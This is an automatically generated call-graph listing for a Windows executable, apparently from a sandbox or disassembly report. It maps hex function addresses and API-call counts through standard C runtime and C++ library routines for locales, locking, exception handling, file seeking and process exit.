17087->17089 17091 1ad628 41 API calls 17088->17091 17093 1ad0ff ctype 17088->17093 17090 1af307 41 API calls 17089->17090 17092 1ad15b 17090->17092 17091->17093 17093->16841 17095 1ad02a 17094->17095 17096 1ad04a 17095->17096 17097 1ad02e 17095->17097 17098 1ad05c 17096->17098 17099 1ad0b2 17096->17099 17101 1ad0bd 41 API calls 17097->17101 17102 1ad628 41 API calls 17098->17102 17104 1ad048 ctype 17098->17104 17100 1af307 41 API calls 17099->17100 17103 1ad0bc 17100->17103 17101->17104 17102->17104 17104->16844 17143 1ada7e 17105->17143 17111 1abfed 17112 1a1c78 17111->17112 17113 1ad51f 49 API calls 17111->17113 17114 1ae4d9 17112->17114 17113->17112 17117 1ae4e3 __EH_prolog 17114->17117 17115 1a1cbd 17118 1ad409 17115->17118 17117->17115 17736 1acfba 17117->17736 17119 1ad413 17118->17119 17120 1ad417 17118->17120 17122 1ad353 39 API calls 17119->17122 17743 1ad23c 17120->17743 17124 1a1cc6 17122->17124 17124->16852 17126 1ad51f 17124->17126 17125 1b575b 69 API calls 17125->17119 17127 1ad53f 17126->17127 17128 1ad547 17126->17128 17861 1a1878 17127->17861 17128->16852 17131 1add7c __EH_prolog 17130->17131 17132 1a11a9 41 API calls 17131->17132 17133 1add90 17132->17133 17133->16860 17135 1ae570 17134->17135 17138 1ae5a7 17135->17138 17930 1ae73d 17135->17930 17138->16860 17977 1ac6a7 17140->17977 17142 1abf50 17142->16859 17144 1b01ab new 16 API calls 17143->17144 17145 1adabb 17144->17145 17167 1aeffd 17145->17167 17147 1adac5 17179 1adeae 17147->17179 17149 1adae9 std::ios_base::_Ios_base_dtor 17150 1abfb7 17149->17150 17151 1ad51f 49 API calls 17149->17151 17152 1ad4a6 17150->17152 17151->17150 17153 1b01ab new 16 API calls 17152->17153 17154 1ad4b7 17153->17154 17155 1aeffd std::locale::_Init 45 API calls 17154->17155 17156 1ad4c0 17155->17156 17509 1ad353 17156->17509 17159 1ad445 17160 1ad488 std::ios_base::_Ios_base_dtor 17159->17160 17161 1ad453 17159->17161 17160->17111 17520 1af4a3 17161->17520 17164 1ad353 39 API calls 17165 1ad471 17164->17165 17530 1ae199 17165->17530 17168 1af009 __EH_prolog3 17167->17168 17194 1aedb7 17168->17194 17172 1af045 17215 1aee0f 17172->17215 17176 1af083 std::locale::_Locimp::_Locimp_dtor 17176->17147 17180 1aedb7 std::_Lockit::_Lockit 7 API calls 17179->17180 17181 1adec0 17180->17181 17380 1a1385 17181->17380 17183 1aded3 std::locale::_Getfacet 17184 1adee6 17183->17184 17386 1a1477 17183->17386 17185 1aee0f std::_Lockit::~_Lockit 2 API calls 17184->17185 17186 1adf1c 17185->17186 17186->17149 17189 1adefd 17396 1aefc8 17189->17396 17190 1adf24 17191 1b2d76 __CxxThrowException@8 RaiseException 17190->17191 17192 1adf44 17191->17192 17195 1aedcd 17194->17195 17196 1aedc6 17194->17196 17199 1aedcb 17195->17199 17227 1af772 EnterCriticalSection 17195->17227 17222 1b68c5 17196->17222 17199->17172 17200 1af16d 17199->17200 17201 1b01ab new 16 API calls 17200->17201 17202 1af178 17201->17202 17204 1af027 17202->17204 17279 1aee2e 17202->17279 17205 1af192 17204->17205 17206 1af19e 17205->17206 17208 1af02f 17205->17208 17282 1af7f2 17206->17282 17209 1aef52 17208->17209 17210 1aef8b ctype 17209->17210 17211 1aef60 17209->17211 17210->17172 17212 1aef6c 17211->17212 17213 1b6300 std::locale::_Locimp::_Locimp_dtor 14 API calls 17211->17213 17212->17210 17214 1b681a ___std_exception_copy 15 API calls 17212->17214 17213->17212 17214->17210 17216 1aee19 17215->17216 17217 1b68d3 17215->17217 17218 1aee2c 17216->17218 17378 1af780 LeaveCriticalSection 17216->17378 17379 1b68ae LeaveCriticalSection 17217->17379 17218->17176 17221 1b68da 17221->17176 17228 1bd0d1 17222->17228 17227->17199 17249 1bca7e 17228->17249 17248 1bd103 17248->17248 17250 1bcc67 std::_Lockit::_Lockit 5 API calls 17249->17250 17251 1bca94 17250->17251 17252 1bca98 17251->17252 17253 1bcc67 std::_Lockit::_Lockit 5 API calls 17252->17253 17254 1bcaae 17253->17254 17255 1bcab2 17254->17255 17256 1bcc67 std::_Lockit::_Lockit 5 API calls 17255->17256 17257 1bcac8 17256->17257 17258 1bcacc 17257->17258 17259 1bcc67 std::_Lockit::_Lockit 5 API calls 17258->17259 17260 1bcae2 17259->17260 17261 1bcae6 17260->17261 17262 1bcc67 std::_Lockit::_Lockit 5 API calls 17261->17262 17263 1bcafc 17262->17263 17264 1bcb00 17263->17264 17265 1bcc67 std::_Lockit::_Lockit 5 API calls 17264->17265 17266 1bcb16 17265->17266 17267 1bcb1a 17266->17267 17268 1bcc67 std::_Lockit::_Lockit 5 API calls 17267->17268 17269 1bcb30 17268->17269 17270 1bcb34 17269->17270 17271 1bcc67 std::_Lockit::_Lockit 5 API calls 17270->17271 17272 1bcb4a 17271->17272 17273 1bcb68 17272->17273 17274 1bcc67 std::_Lockit::_Lockit 5 API calls 17273->17274 17275 1bcb7e 17274->17275 17276 1bcb4e 17275->17276 17277 1bcc67 std::_Lockit::_Lockit 5 API calls 17276->17277 17278 1bcb64 17277->17278 17278->17248 17280 1aef52 _Yarn 15 API calls 17279->17280 17281 1aee68 17280->17281 17281->17204 17283 1b72ec 17282->17283 17284 1af802 EncodePointer 17282->17284 17295 1beebe 17283->17295 17284->17208 17284->17283 17288 1b7325 17325 1b821d 17288->17325 17289 1b7306 IsProcessorFeaturePresent 17291 1b7312 17289->17291 17290 1b72fc 17290->17288 17290->17289 17294 1b5909 _Atexit 8 API calls 17291->17294 17294->17288 17328 1bedec 17295->17328 17298 1bef03 17299 1bef0f ___BuildCatchObject 17298->17299 17300 1bb4cd __dosmaperr 14 API calls 17299->17300 17301 1bef5f 17299->17301 17303 1bef71 _Atexit 17299->17303 17307 1bef40 _Atexit 17299->17307 17300->17307 17302 1b6094 __dosmaperr 14 API calls 17301->17302 17304 1bef64 17302->17304 17305 1befa7 _Atexit 17303->17305 17338 1b6866 EnterCriticalSection 17303->17338 17308 1b5b05 ___std_exception_copy 39 API calls 17304->17308 17310 1bf0e1 17305->17310 17311 1befe4 17305->17311 17321 1bf012 17305->17321 17307->17301 17307->17303 17324 1bef49 17307->17324 17308->17324 17313 1bf0ec 17310->17313 17343 1b68ae LeaveCriticalSection 17310->17343 17317 1bb37c __Getctype 39 API calls 17311->17317 17311->17321 17315 1b821d _Atexit 21 API calls 17313->17315 17316 1bf0f4 17315->17316 17319 1bf007 17317->17319 17318 1bb37c __Getctype 39 API calls 17322 1bf067 17318->17322 17320 1bb37c __Getctype 39 API calls 17319->17320 17320->17321 17339 1bf08d 17321->17339 17323 1bb37c __Getctype 39 API calls 17322->17323 17322->17324 17323->17324 17324->17290 17345 1b804b 17325->17345 17329 1bedf8 ___BuildCatchObject 17328->17329 17334 1b6866 EnterCriticalSection 17329->17334 17331 1bee06 17335 1bee48 17331->17335 17334->17331 17336 1b68ae std::_Lockit::~_Lockit LeaveCriticalSection 17335->17336 17337 1b72f1 17336->17337 17337->17290 17337->17298 17338->17305 17340 1bf059 17339->17340 17341 1bf091 17339->17341 17340->17318 17340->17322 17340->17324 17344 1b68ae LeaveCriticalSection 17341->17344 17343->17313 17344->17340 17346 1b8078 17345->17346 17354 1b8089 17345->17354 17356 1b8113 GetModuleHandleW 17346->17356 17351 1b732f 17363 1b7f16 17354->17363 17357 1b807d 17356->17357 17357->17354 17358 1b816e GetModuleHandleExW 17357->17358 17359 1b81c1 17358->17359 17360 1b81ad GetProcAddress 17358->17360 17361 1b81dd 17359->17361 17362 1b81d4 FreeLibrary 17359->17362 17360->17359 17361->17354 17362->17361 17364 1b7f22 ___BuildCatchObject 17363->17364 17365 1b6866 std::_Lockit::_Lockit EnterCriticalSection 17364->17365 17366 1b7f2c 17365->17366 17367 1b7f63 _Atexit 14 API calls 17366->17367 17368 1b7f39 17367->17368 17369 1b7f57 _Atexit LeaveCriticalSection 17368->17369 17370 1b7f45 17369->17370 17370->17351 17371 1b80e2 17370->17371 17372 1b8155 _Atexit 5 API calls 17371->17372 17373 1b80ec 17372->17373 17374 1b8100 17373->17374 17375 1b80f0 GetCurrentProcess TerminateProcess 17373->17375 17376 1b816e _Atexit GetModuleHandleExW GetProcAddress FreeLibrary 17374->17376 17375->17374 17377 1b8108 ExitProcess 17376->17377 17378->17218 17379->17221 17381 1a1391 17380->17381 17382 1a13b5 17380->17382 17383 1aedb7 std::_Lockit::_Lockit 7 API calls 17381->17383 17382->17183 17384 1a139b 17383->17384 17385 1aee0f std::_Lockit::~_Lockit 2 API calls 17384->17385 17385->17382 17387 1a1489 17386->17387 17388 1a14be 17386->17388 17387->17388 17389 1b01ab new 16 API calls 17387->17389 17388->17189 17388->17190 17390 1a1496 17389->17390 17399 1a1253 17390->17399 17397 1b01ab new 16 API calls 17396->17397 17398 1aefd3 17397->17398 17398->17184 17400 1aedb7 std::_Lockit::_Lockit 7 API calls 17399->17400 17401 1a1265 17400->17401 17402 1a1292 17401->17402 17403 1a12a7 17401->17403 17434 1af100 17402->17434 17404 1a10a2 std::exception::exception 40 API calls 17403->17404 17406 1a12b4 17404->17406 17408 1b2d76 __CxxThrowException@8 RaiseException 17406->17408 17409 1a12c9 17408->17409 17410 1a1442 17456 1af4ee 17410->17456 17413 1a12ca 17503 1af14b 17413->17503 17416 1a12e3 17418 1a12f6 17416->17418 17419 1b6300 std::locale::_Locimp::_Locimp_dtor 14 API calls 17416->17419 17417 1b6300 std::locale::_Locimp::_Locimp_dtor 14 API calls 17417->17416 17420 1a1307 17418->17420 17422 1b6300 std::locale::_Locimp::_Locimp_dtor 14 API calls 17418->17422 17419->17418 17421 1a1318 17420->17421 17423 1b6300 std::locale::_Locimp::_Locimp_dtor 14 API calls 17420->17423 17424 1a1329 17421->17424 17425 1b6300 std::locale::_Locimp::_Locimp_dtor 14 API calls 17421->17425 17422->17420 17423->17421 17426 1a133a 17424->17426 17427 1b6300 std::locale::_Locimp::_Locimp_dtor 14 API calls 17424->17427 17425->17424 17428 1aee19 17426->17428 17429 1b68d3 17426->17429 17427->17426 17430 1aee2c 17428->17430 17507 1af780 LeaveCriticalSection 17428->17507 17508 1b68ae LeaveCriticalSection 17429->17508 17430->17388 17433 1b68da 17433->17388 17443 1b6b31 17434->17443 17437 1aef52 _Yarn 15 API calls 17439 1af124 17437->17439 17438 1af134 17441 1aef52 _Yarn 15 API calls 17438->17441 17439->17438 17440 1b6b31 std::_Locinfo::_Locinfo_dtor 66 API calls 17439->17440 17440->17438 17442 1a129b 17441->17442 17442->17410 17444 1bd0d1 std::_Lockit::_Lockit 5 API calls 17443->17444 17445 1b6b3e 17444->17445 17448 1b68dc 17445->17448 17449 1b68e8 ___BuildCatchObject 17448->17449 17450 1b6866 std::_Lockit::_Lockit EnterCriticalSection 17449->17450 17451 1b68f6 17450->17451 17452 1b6937 std::_Locinfo::_Locinfo_dtor 66 API calls 17451->17452 17453 1b6903 17452->17453 17454 1b692b std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 17453->17454 17455 1af10c 17454->17455 17455->17437 17470 1b6e43 17456->17470 17459 1b6c2b __Getctype 14 API calls 17460 1af508 17459->17460 17461 1af52f 17460->17461 17462 1af511 17460->17462 17464 1b6c88 __Getctype 39 API calls 17461->17464 17475 1b6c88 17462->17475 17465 1af518 17464->17465 17480 1b6e68 17465->17480 17468 1a1462 17468->17413 17471 1bb37c __Getctype 39 API calls 17470->17471 17472 1b6e4e 17471->17472 17473 1be69d __Getctype 39 API calls 17472->17473 17474 1af4f7 17473->17474 17474->17459 17476 1bb37c __Getctype 39 API calls 17475->17476 17477 1b6c93 17476->17477 17478 1be69d __Getctype 39 API calls 17477->17478 17479 1b6ca3 17478->17479 17479->17465 17481 1bb37c __Getctype 39 API calls 17480->17481 17482 1b6e73 17481->17482 17483 1be69d __Getctype 39 API calls 17482->17483 17484 1af540 17483->17484 17484->17468 17485 1b6de4 17484->17485 17486 1b6e2c 17485->17486 17487 1b6df1 17485->17487 17486->17468 17487->17487 17488 1b681a ___std_exception_copy 15 API calls 17487->17488 17489 1b6e14 17488->17489 17489->17486 17494 1b7b0f 17489->17494 17492 1b5b32 __Getctype 11 API calls 17493 1b6e42 17492->17493 17495 1b7b1d 17494->17495 17496 1b7b2b 17494->17496 17495->17496 17501 1b7b45 17495->17501 17497 1b6094 __dosmaperr 14 API calls 17496->17497 17498 1b7b35 17497->17498 17500 1b5b05 ___std_exception_copy 39 API calls 17498->17500 17499 1b6e25 17499->17486 17499->17492 17500->17499 17501->17499 17502 1b6094 __dosmaperr 14 API calls 17501->17502 17502->17498 17504 1a12d4 17503->17504 17505 1af157 17503->17505 17504->17416 17504->17417 17506 1b6b31 std::_Locinfo::_Locinfo_dtor 66 API calls 17505->17506 17506->17504 17507->17430 17508->17433 17510 1abfd7 17509->17510 17511 1ad3b1 17509->17511 17510->17159 17513 1b5c8a 17511->17513 17514 1b5c96 17513->17514 17516 1b5cab 17513->17516 17515 1b6094 __dosmaperr 14 API calls 17514->17515 17517 1b5c9b 17515->17517 17516->17510 17518 1b5b05 ___std_exception_copy 39 API calls 17517->17518 17519 1b5ca6 17518->17519 17519->17510 17521 1af401 17520->17521 17525 1af460 17521->17525 17529 1ad460 17521->17529 17545 1af4ac 17521->17545 17522 1af4ac 42 API calls 17524 1af47c 17522->17524 17524->17529 17554 1b67e0 17524->17554 17525->17522 17527 1af467 17525->17527 17527->17529 17548 1b575b 17527->17548 17529->17160 17529->17164 17531 1aedb7 std::_Lockit::_Lockit 7 API calls 17530->17531 17532 1ae1ab 17531->17532 17533 1a1385 int 9 API calls 17532->17533 17535 1ae1be std::locale::_Getfacet 17533->17535 17534 1ae1d1 17536 1aee0f std::_Lockit::~_Lockit 2 API calls 17534->17536 17535->17534 17728 1ae26e 17535->17728 17538 1ae207 17536->17538 17538->17160 17540 1ae1e8 17544 1aefc8 std::_Facet_Register 16 API calls 17540->17544 17541 1ae20f 17542 1b2d76 __CxxThrowException@8 RaiseException 17541->17542 17543 1ae22f 17542->17543 17544->17534 17560 1b6c20 17545->17560 17549 1b576e ___std_exception_copy 17548->17549 17611 1b5636 17549->17611 17551 1b577a 17552 1b509f ___std_exception_copy 39 API calls 17551->17552 17553 1b5786 17552->17553 17553->17529 17555 1b67f3 ___std_exception_copy 17554->17555 17684 1b6537 17555->17684 17558 1b509f ___std_exception_copy 39 API calls 17559 1b6815 17558->17559 17559->17527 17562 1b6b69 ___BuildCatchObject 17560->17562 17561 1b6b7c 17563 1b6094 __dosmaperr 14 API calls 17561->17563 17562->17561 17565 1b6b9c 17562->17565 17564 1b6b81 17563->17564 17566 1b5b05 ___std_exception_copy 39 API calls 17564->17566 17567 1b6bae 17565->17567 17568 1b6ba1 17565->17568 17576 1af4c4 17566->17576 17577 1bc682 17567->17577 17570 1b6094 __dosmaperr 14 API calls 17568->17570 17570->17576 17572 1b6bbe 17573 1b6094 __dosmaperr 14 API calls 17572->17573 17573->17576 17574 1b6bcb 17585 1b6c09 17574->17585 17576->17525 17578 1bc68e ___BuildCatchObject 17577->17578 17589 1b6866 EnterCriticalSection 17578->17589 17580 1bc69c 17590 1bc726 17580->17590 17587 1b6c0d 17585->17587 17610 1b5ce4 LeaveCriticalSection 17587->17610 17588 1b6c1e 17588->17576 17589->17580 17591 1bc749 17590->17591 17592 1bc7a1 17591->17592 17599 1bc6a9 17591->17599 17606 1b5cd0 EnterCriticalSection 17591->17606 17607 1b5ce4 LeaveCriticalSection 17591->17607 17593 1b6c2b __Getctype 14 API calls 17592->17593 17594 1bc7aa 17593->17594 17596 1b7805 ___vcrt_freefls@4 14 API calls 17594->17596 17597 1bc7b3 17596->17597 17598 1bcf76 __wsopen_s 6 API calls 17597->17598 17597->17599 17600 1bc7d2 17598->17600 17603 1bc6e2 17599->17603 17608 1b5cd0 EnterCriticalSection 17600->17608 17609 1b68ae LeaveCriticalSection 17603->17609 17605 1b6bb7 17605->17572 17605->17574 17606->17591 17607->17591 17608->17599 17609->17605 17610->17588 17612 1b5642 ___BuildCatchObject 17611->17612 17613 1b566f 17612->17613 17614 1b564c 17612->17614 17621 1b5667 17613->17621 17622 1b5cd0 EnterCriticalSection 17613->17622 17615 1b5a88 ___std_exception_copy 39 API calls 17614->17615 17615->17621 17617 1b568d 17623 1b56cd 17617->17623 17619 1b569a 17637 1b56c5 17619->17637 17621->17551 17622->17617 17624 1b56da 17623->17624 17625 1b56fd 17623->17625 17626 1b5a88 ___std_exception_copy 39 API calls 17624->17626 17627 1b56f5 17625->17627 17640 1b550c 17625->17640 17626->17627 17627->17619 17633 1b5729 17657 1bc50f 17633->17657 17636 1b7805 ___vcrt_freefls@4 14 API calls 17636->17627 17683 1b5ce4 LeaveCriticalSection 17637->17683 17639 1b56cb 17639->17621 17641 1b5525 17640->17641 17645 1b554c 17640->17645 17642 1badbf ___scrt_uninitialize_crt 39 API calls 17641->17642 17641->17645 17643 1b5541 17642->17643 17664 1bc151 17643->17664 17646 1bc7e8 17645->17646 17647 1bc7ff 17646->17647 17648 1b571d 17646->17648 17647->17648 17649 1b7805 ___vcrt_freefls@4 14 API calls 17647->17649 17650 1badbf 17648->17650 17649->17648 17651 1badcb 17650->17651 17652 1bade0 17650->17652 17653 1b6094 __dosmaperr 14 API calls 17651->17653 17652->17633 17654 1badd0 17653->17654 17655 1b5b05 ___std_exception_copy 39 API calls 17654->17655 17656 1baddb 17655->17656 17656->17633 17658 1bc538 17657->17658 17661 1b5730 17657->17661 17659 1bc587 17658->17659 17662 1bc55f 17658->17662 17660 1b5a88 ___std_exception_copy 39 API calls 17659->17660 17660->17661 17661->17627 17661->17636 17675 1bc47e 17662->17675 17667 1bc15d ___BuildCatchObject 17664->17667 17665 1bc165 17665->17645 17666 1bc19e 17669 1b5a88 ___std_exception_copy 39 API calls 17666->17669 17667->17665 17667->17666 17668 1bc1e4 17667->17668 17670 1c2bc9 __wsopen_s EnterCriticalSection 17668->17670 17669->17665 17671 1bc1ea 17670->17671 17672 1bc208 17671->17672 17673 1bc262 __wsopen_s 62 API calls 17671->17673 17674 1bc25a __wsopen_s LeaveCriticalSection 17672->17674 17673->17672 17674->17665 17676 1bc48a ___BuildCatchObject 17675->17676 17677 1c2bc9 __wsopen_s EnterCriticalSection 17676->17677 17678 1bc498 17677->17678 17679 1bc4c9 17678->17679 17680 1bc5e2 __wsopen_s 42 API calls 17678->17680 17681 1bc503 LeaveCriticalSection 17679->17681 17680->17679 17682 1bc4ec 17681->17682 17682->17661 17683->17639 17686 1b6543 ___BuildCatchObject 17684->17686 17685 1b6549 17687 1b5a88 ___std_exception_copy 39 API calls 17685->17687 17686->17685 17689 1b658c 17686->17689 17688 1b6564 17687->17688 17688->17558 17695 1b5cd0 EnterCriticalSection 17689->17695 17691 1b6598 17696 1b66ba 17691->17696 17693 1b65ae 17705 1b65d7 17693->17705 17695->17691 17697 1b66cd 17696->17697 17698 1b66e0 17696->17698 17697->17693 17708 1b65e1 17698->17708 17700 1b6791 17700->17693 17701 1b6703 17701->17700 17702 1b550c ___scrt_uninitialize_crt 64 API calls 17701->17702 17703 1b6731 17702->17703 17712 1bdbfe 17703->17712 17727 1b5ce4 LeaveCriticalSection 17705->17727 17707 1b65df 17707->17688 17709 1b65f2 17708->17709 17711 1b664a 17708->17711 17709->17711 17715 1bdbbe 17709->17715 17711->17701 17721 1bdadd 17712->17721 17714 1bdc17 17714->17700 17716 1bdbd2 ___std_exception_copy 17715->17716 17717 1bdadd __wsopen_s 41 API calls 17716->17717 17718 1bdbe7 17717->17718 17719 1b509f ___std_exception_copy 39 API calls 17718->17719 17720 1bdbf6 17719->17720 17720->17711 17722 1c2e45 __wsopen_s 39 API calls 17721->17722 17723 1bdaef 17722->17723 17724 1bdb0b SetFilePointerEx 17723->17724 17726 1bdaf7 __wsopen_s 17723->17726 17725 1bdb23 GetLastError 17724->17725 17724->17726 17725->17726 17726->17714 17727->17707 17729 1ae280 17728->17729 17730 1ae1e1 17728->17730 17729->17730 17731 1b01ab new 16 API calls 17729->17731 17730->17540 17730->17541 17732 1ae28d 17731->17732 17733 1a1253 69 API calls 17732->17733 17734 1ae2a1 17733->17734 17735 1a12ca std::_Locinfo::~_Locinfo 67 API calls 17734->17735 17735->17730 17737 1ad00f 17736->17737 17738 1acfd0 17736->17738 17739 1af307 41 API calls 17737->17739 17741 1ad628 41 API calls 17738->17741 17742 1acfe1 17738->17742 17740 1ad019 17739->17740 17741->17742 17742->17117 17744 1ad26a 17743->17744 17745 1ad254 17743->17745 17744->17125 17745->17744 17754 1ac4dc 17745->17754 17749 1ad2cb 17751 1acba9 39 API calls 17749->17751 17751->17744 17752 1ad28f 17752->17749 17753 1acfba 41 API calls 17752->17753 17775 1b5fbd 17752->17775 17753->17752 17755 1ac4fd 17754->17755 17760 1ac4f6 17754->17760 17756 1ac55f 17755->17756 17757 1ac546 17755->17757 17755->17760 17759 1ace5d 41 API calls 17756->17759 17781 1b529f 17757->17781 17767 1ac57f 17759->17767 17760->17744 17768 1ace5d 17760->17768 17761 1ac64b 17763 1acba9 39 API calls 17761->17763 17762 1ac650 17762->17761 17764 1b529f 41 API calls 17762->17764 17763->17760 17764->17761 17765 1b5fbd 67 API calls 17765->17767 17766 1acfba 41 API calls 17766->17767 17767->17761 17767->17762 17767->17765 17767->17766 17769 1ace6c 17768->17769 17770 1acea0 17768->17770 17771 1ad628 41 API calls 17769->17771 17772 1af307 41 API calls 17770->17772 17774 1ace74 17771->17774 17773 1aceaa 17772->17773 17774->17752 17776 1b5fd0 ___std_exception_copy 17775->17776 17806 1b5d9f 17776->17806 17778 1b5fe5 17779 1b509f ___std_exception_copy 39 API calls 17778->17779 17780 1b5ff2 17779->17780 17780->17752 17782 1b52b2 ___std_exception_copy 17781->17782 17787 1b50db 17782->17787 17784 1b52c1 17785 1b509f ___std_exception_copy 39 API calls 17784->17785 17786 1b52ce 17785->17786 17786->17760 17788 1b50e7 ___BuildCatchObject 17787->17788 17789 1b50f0 17788->17789 17790 1b5114 17788->17790 17791 1b5a88 ___std_exception_copy 39 API calls 17789->17791 17801 1b5cd0 EnterCriticalSection 17790->17801 17800 1b5109 @_EH4_CallFilterFunc@8 17791->17800 17793 1b511d 17794 1b5132 17793->17794 17795 1badbf ___scrt_uninitialize_crt 39 API calls 17793->17795 17796 1b51cf 17794->17796 17797 1b519e 17794->17797 17795->17794 17802 1b5207 17796->17802 17798 1b5a88 ___std_exception_copy 39 API calls 17797->17798 17798->17800 17800->17784 17801->17793 17805 1b5ce4 LeaveCriticalSection 17802->17805 17804 1b520d 17804->17800 17805->17804 17807 1b5dd5 17806->17807 17808 1b5dad 17806->17808 17807->17778 17808->17807 17809 1b5dba 17808->17809 17810 1b5ddc 17808->17810 17811 1b5a88 ___std_exception_copy 39 API calls 17809->17811 17814 1b5cf8 17810->17814 17811->17807 17815 1b5d04 ___BuildCatchObject 17814->17815 17822 1b5cd0 EnterCriticalSection 17815->17822 17817 1b5d12 17823 1b5d53 17817->17823 17822->17817 17833 1bd23b 17823->17833 17830 1b5d47 17860 1b5ce4 LeaveCriticalSection 17830->17860 17832 1b5d30 17832->17778 17853 1bd1fd 17833->17853 17835 1b5d6b 17840 1b5e16 17835->17840 17836 1bd24c 17836->17835 17837 1b7330 ___crtLCMapStringA 15 API calls 17836->17837 17838 1bd2a5 17837->17838 17839 1b7805 ___vcrt_freefls@4 14 API calls 17838->17839 17839->17835 17842 1b5e28 17840->17842 17844 1b5d89 17840->17844 17841 1b5e36 17843 1b5a88 ___std_exception_copy 39 API calls 17841->17843 17842->17841 17842->17844 17847 1b5e6c ctype 17842->17847 17843->17844 17849 1bd2e6 17844->17849 17845 1b550c ___scrt_uninitialize_crt 64 API calls 17845->17847 17846 1badbf ___scrt_uninitialize_crt 39 API calls 17846->17847 17847->17844 17847->17845 17847->17846 17848 1bc151 __wsopen_s 64 API calls 17847->17848 17848->17847 17850 1b5d1f 17849->17850 17851 1bd2f1 17849->17851 17850->17830 17851->17850 17852 1b550c ___scrt_uninitialize_crt 64 API calls 17851->17852 17852->17850 17854 1bd209 17853->17854 17855 1bd233 17854->17855 17856 1badbf ___scrt_uninitialize_crt 39 API calls 17854->17856 17855->17836 17857 1bd224 17856->17857 17858 1c55ba __wsopen_s 39 API calls 17857->17858 17859 1bd22a 17858->17859 17859->17836 17860->17832 17862 1a18a4 17861->17862 17863 1a1884 17861->17863 17868 1b2d76 __CxxThrowException@8 RaiseException 17862->17868 17864 1a18af 17863->17864 17865 1a1891 17863->17865 17866 1a18b3 17864->17866 17867 1a18c0 17864->17867 17877 1a16a2 17865->17877 17871 1a16a2 47 API calls 17866->17871 17872 1a16a2 47 API calls 17867->17872 17873 1a18d6 17868->17873 17870 1a1896 17885 1a1830 17870->17885 17871->17870 17872->17870 17892 1a190d 17873->17892 17878 1a16ba 17877->17878 17879 1a16bc 17877->17879 17895 1b00a7 17878->17895 17879->17870 17886 1abdfc 41 API calls 17885->17886 17887 1a184e 17886->17887 17909 1a170c 17887->17909 17890 1acba9 39 API calls 17891 1a1867 17890->17891 17891->17862 17927 1a10d9 17892->17927 17900 1b00ed EnterCriticalSection 17895->17900 17897 1b00b0 17898 1b00c7 17897->17898 17901 1b0146 17897->17901 17900->17897 17902 1b0153 17901->17902 17903 1b0184 17901->17903 17902->17897 17907 1b013a LeaveCriticalSection 17903->17907 17905 1b0189 WaitForSingleObjectEx 17908 1b00ed EnterCriticalSection 17905->17908 17907->17905 17908->17902 17924 1abe2b 17909->17924 17911 1a1747 17914 1ad0bd 41 API calls 17911->17914 17912 1a1722 17912->17911 17913 1ad01a 41 API calls 17912->17913 17913->17911 17915 1a1764 17914->17915 17916 1acba9 39 API calls 17915->17916 17917 1a176f 17916->17917 17918 1acba9 39 API calls 17917->17918 17919 1a1793 17918->17919 17920 1a10a2 std::exception::exception 40 API calls 17919->17920 17921 1a17a6 17920->17921 17922 1acba9 39 API calls 17921->17922 17923 1a17b7 17922->17923 17923->17890 17925 1acf24 41 API calls 17924->17925 17926 1abe4a 17925->17926 17926->17912 17928 1b0fcd ___std_exception_copy 40 API calls 17927->17928 17929 1a10fc 17928->17929 17929->17128 17931 1ae747 __EH_prolog 17930->17931 17944 1ae9a5 17931->17944 17934 1ae5c6 17936 1ae7c6 17934->17936 17935 1abe2b 41 API calls 17935->17934 17937 1ae7d0 __EH_prolog 17936->17937 17939 1ae8f0 17937->17939 17941 1ae7e9 17937->17941 17960 1aeb5b 17939->17960 17940 1ae7fb 17940->17138 17948 1aea3b 17941->17948 17945 1ae9af __EH_prolog 17944->17945 17946 1a11a9 41 API calls 17945->17946 17947 1ae754 17946->17947 17947->17934 17947->17935 17949 1aeb48 17948->17949 17953 1aea4c 17948->17953 17967 1aea1a 17949->17967 17952 1af307 41 API calls 17955 1aeb5a __EH_prolog 17952->17955 17953->17940 17954 1aebc7 17956 1aea3b 41 API calls 17954->17956 17955->17954 17957 1aec1c 17955->17957 17958 1aebd9 17956->17958 17959 1aea1a 39 API calls 17957->17959 17958->17940 17959->17958 17962 1aeb65 __EH_prolog 17960->17962 17961 1aebc7 17963 1aea3b 41 API calls 17961->17963 17962->17961 17964 1aec1c 17962->17964 17965 1ae908 17963->17965 17966 1aea1a 39 API calls 17964->17966 17966->17965 17972 1ae230 17967->17972 17970 1a11f8 39 API calls 17971 1aea36 17970->17971 17971->17952 17973 1acba9 39 API calls 17972->17973 17974 1ae243 17973->17974 17975 1acba9 39 API calls 17974->17975 17976 1ae24e 17975->17976 17976->17970 17978 1ac6b6 17977->17978 17979 1ad409 72 API calls 17978->17979 17980 1ac6c8 std::ios_base::_Ios_base_dtor ctype 17978->17980 17979->17980 17980->17142 17982 1acca4 17981->17982 17983 1acca8 17982->17983 17984 1acccd 17982->17984 18014 1ad6c8 17983->18014 17985 1ad5d3 41 API calls 17984->17985 17986 1accd9 17985->17986 17987 1acdd9 17986->17987 17992 1accf7 ___BuildCatchObject 17986->17992 17989 1af307 41 API calls 17987->17989 17990 1acde3 17989->17990 17991 1ad628 41 API calls 17993 1accc8 ___BuildCatchObject ctype 17991->17993 17992->17991 17992->17993 17993->16875 17995 1ada7e 79 API calls 17994->17995 17996 1abed7 17995->17996 17997 1ad4a6 45 API calls 17996->17997 17998 1abef7 17997->17998 17999 1ad445 99 API calls 17998->17999 18000 1abf0d 17999->18000 18001 1a1f62 18000->18001 18002 1ad51f 49 API calls 18000->18002 18003 1adfb1 18001->18003 18002->18001 18004 1adfbb __EH_prolog 18003->18004 18025 1ae2e8 18004->18025 18006 1ad51f 49 API calls 18007 1ae104 18006->18007 18029 1ae2be 18007->18029 18010 1ae007 18010->18006 18010->18007 18012 1ac6a7 72 API calls 18011->18012 18013 1abe77 18012->18013 18013->16885 18015 1ad5d3 41 API calls 18014->18015 18016 1ad6dd 18015->18016 18017 1ad5d3 41 API calls 18016->18017 18018 1ad6e9 18017->18018 18019 1ada48 18018->18019 18020 1ad725 18018->18020 18021 1af307 41 API calls 18019->18021 18022 1ad628 41 API calls 18020->18022 18024 1ad749 ___BuildCatchObject ctype 18020->18024 18023 1ada52 18021->18023 18022->18024 18024->17993 18026 1ae304 18025->18026 18027 1ae326 18026->18027 18033 1ae37c 18026->18033 18027->18010 18030 1ae2c6 18029->18030 18031 1a1f72 18030->18031 18041 1ae3d2 18030->18041 18031->16880 18034 1ae3cb 18033->18034 18035 1ae391 18033->18035 18034->18027 18036 1ae2e8 49 API calls 18035->18036 18039 1ae39a 18036->18039 18037 1ae3c3 18038 1ae2be 49 API calls 18037->18038 18038->18034 18039->18037 18040 1ad51f 49 API calls 18039->18040 18040->18037 18043 1ae3dc 